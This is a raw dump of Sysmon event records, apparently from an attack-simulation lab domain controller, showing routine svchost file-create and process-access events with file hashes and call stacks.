AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache131420249992652675.txtMD5=35CB8C19D2035D2165E1EFA7FA0ADF70,SHA256=5DCC967527060112D9824F3C852F5F1344613C12F2BEEAAF6D67A901E00B615F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005287Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.850{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{93e918b8-f239-44ba-b3fb-ad2d4b5024b9}\settingssynonyms.txtMD5=9239D33BCC9C55C4D97DCAE64A7E2F5B,SHA256=D147C9B76ACC226324DEF206D680C3368109018BE254FD1399C8E2ED2C3D77E8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005286Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.850{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{93e918b8-f239-44ba-b3fb-ad2d4b5024b9}\settingsglobals.txtMD5=D2D6B108ED635B192276F2E13160BB9F,SHA256=598A2674BE811C1256B0E18311CE5CBA2A542D0965FF4A0AC96173CE78A4C575,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000005285Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.850{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\Settings\settings.dat2021-03-31 12:02:17.850 23542300x80000000000000005284Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.850{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{93e918b8-f239-44ba-b3fb-ad2d4b5024b9}\settingsconversions.txtMD5=F21F68AB0FD9BF5B4255EDDDE72BE816,SHA256=9034FBD5F370A37A2E43CAE5D482B84D3ED9B6C62C6DDBC4BEE25B0526AD25EE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005283Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.850{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{93e918b8-f239-44ba-b3fb-ad2d4b5024b9}\settings.schemaMD5=AC68AC6BFFD26DBEA6B7DBD00A19A3DD,SHA256=D6BDEAA9BC0674AE9E8C43F2E9F68A2C7BB8575B3509685B481940FDA834E031,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005282Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.834{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\Settings\settings.datMD5=A8308D2F3DDE0745E8B678BF69A2ECD0,SHA256=7FBB3E503ED8A4A8E5D5FAB601883CBB31D2E06D6B598460E570FB7A763EE555,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005281Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.834{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{93e918b8-f239-44ba-b3fb-ad2d4b5024b9}\settings.csgMD5=A97FD910ECCB1049B949DF2B6D0EA605,SHA256=B84B14439AD5607B15A96B922CD63EA6C8CB1281BF3B84037C5CE90FBEB29766,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005280Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.834{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{93e918b8-f239-44ba-b3fb-ad2d4b5024b9}\appssynonyms.txtMD5=E86D86E41327A21E2448076DD6C97A81,SHA256=A3DC890A9E3D99D3336455F0CFD94ACCAAD69242D0A1C8649AC82B8E1F8BB6FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005279Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.834{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{93e918b8-f239-44ba-b3fb-ad2d4b5024b9}\appsglobals.txtMD5=5925E930562DA940101DE785C1CBC5B3,SHA256=B6C3C8B85CECB5743E5A62C706152F83606B5690F0926B5CC16D29CBFE3ED39B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005278Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.834{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005277Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.834{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005276Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.834{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B1932E67E94B41E878381D8D2CE15118,SHA256=94DF502EF884F8A14ECCF8B38573020DE35D42A004D76AEBA32A09A93D7173BB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005275Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.834{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005274Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.819{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005273Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.819{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005272Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.819{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005271Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.819{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005270Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.819{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005269Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.819{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005268Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.819{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005267Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.819{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005266Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.819{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005265Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.819{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005264Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.819{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005263Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.819{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005262Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.819{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005261Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.819{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005260Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.819{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005259Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.787{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9